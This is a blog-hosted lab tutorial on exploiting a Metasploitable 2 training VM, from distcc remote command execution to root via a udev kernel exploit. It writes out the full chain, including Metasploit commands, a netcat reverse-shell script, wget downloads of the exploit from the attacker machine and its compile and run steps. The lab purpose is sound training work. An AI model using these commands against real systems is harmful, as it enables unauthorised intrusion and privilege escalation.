Powered by Blogger.
Home » » Privilege Escalation in Metasploitable

Privilege Escalation in Metasploitable

Written By AKADEMY on Sunday, February 23, 2020 | 7:18 AM

What You Need for this Project

  • A Metasploitable 2 VM to be the target
  • A Kali machine to act as the attacker

Purpose

To practice using sparta to find vulnerable services, Metasploit to exploit them, searchsploit to find privilege escalation exploits, and using them.

Setup

Start the Target

Start Metsploitable 2. Execute the ifconfig command to get its IP address.

Start the Kali Attacker

Start your Kali VM and log in. Ping the Metasploitable 2 target. If you don't get replies, fix your networking before proceeding.

Task 1: Get a Shell with Low Privileges

Scanning with Sparta

Sparta is a wonderful scanner, fast and effective.
On Kali, in a Terminal, execute this command.
sparta
In the Sparta window, click "Click here to add host(s) to scope". In the "Add hosts(s) to scope" box, enter your Metasploitable 2 IP address, as shown below.
Click the "Add to scope" button.

Within a few seconds, Sparta finds the more obvious services, but it keeps scanning.
A box will pop up attempting to show a screenshot. Close it.
After about 2 minutes, it will find "distcc", as shown below.
DistCC is a used to scale large compiler jobs across systems, but it can be abused to execute arbitrary commands.

Close Sparta.

Using Metasploit to Exploit DistCC

On Kali, in a Terminal, execute this command.
msfconsole
In Metasploit, execute this command.
search distcc
In Metasploit, execute this command.
info exploit/unix/misc/distcc_exec
As shown below, this exploit only requires RHOST.



In Metasploit, execute these commands, using the IP of your Metasploitable 2 target.
use exploit/unix/misc/distcc_exec
set RHOST 172.16.1.190
exploit
whoami
You get a shell, running as "daemon", as shown below.


Saving the Screen Image: A

Make sure you can see whoami and daemon, as shown above.
Save a FULL DESKTOP image with the filename Proj 18xa from Your Name.


Task 2: Escalating Privileges with a Udev Exploit

Finding the Kernel Version

To escalate privileges, you need a kernel exploit. So the first task is to find out what kernel version the target uses.
In Metasploit, in the command shell, execute these commands.
uname -a
lsb_release -a
The target has kernel 2.6.24 and is running Ubuntu 8.04, as shown below.


Finding Exploits

On Kali, open a new Terminal and execute this command, to find exploits that escalate privileges on this kernel.
searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6
We'll use the 8572.c exploit, highlighted in the image below.

On Kali, execute this command, to examine the exploit source code.
less /usr/share/exploitdb/platforms/linux/local/8572.c
Information about the exploit appears, as shown below.
Read it and then press Q to exit "less".


Serving the Exploit with Apache

On Kali, execute these command to restart apache2, and make a symbolic link that will make all the exploits available for download.
service apache2 restart
ln -s /usr/share/exploitdb/platforms/linux/local/ /var/www/html/


Preparing a run File

The exploit will execute the /tmp/run file on the target, so we need to make it.
We'll use a simple netcat reverse shell.
On Kali, execute this command.
nano /var/www/html/run
In nano, enter these lines, replacing the IP address with the address of your Kali machine.
#!/bin/bash
nc 172.16.1.188 12345 -e /bin/bash
Press Ctrl+CYEnter to save the file.


Uploading the Files

On Kali, in your low-privilege shell, execute these commands to upload the files to the target. Replace the IP address with the IP address of your Kali machine.
cd /tmp
wget http://172.16.1.188/run
wget http://172.16.1.188/local/8572.c


Compiling the Exploit

On Kali, in your low-privilege shell, execute these commands to compile the exploit file and list files.
gcc -o exploit 8572.c
ls -l


Finding the PID

The exploit documentation said that we needed the process identifier (PID) of the udevd netlink socket.
On Kali, in your low-privilege shell, execute these commands to list network processes, and the udev process.
cat /proc/net/netlink
ps aux | grep udev
The only nonzero PID in netlink should be the number you want. When I did it, it was 2738, as shown below.
For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.


Starting a Listener

When the udev exploit runs, it will execute the "run" script, which will connect back to Kali on port 12345.
On Kali, open a new Terminal window and execute these command to listen for connections.
nc -lvp 12345


Running the Exploit

On Kali, in your low-privilege shell, execute this command to escalate privileges and open a reverse shell. Replace the number with the correct PID for your target.
./exploit 2738
The only nonzero PID in netlink should be the number you want. When I did it, it was 2738, as shown below.
For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.


Saving the Screen Image: B

Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT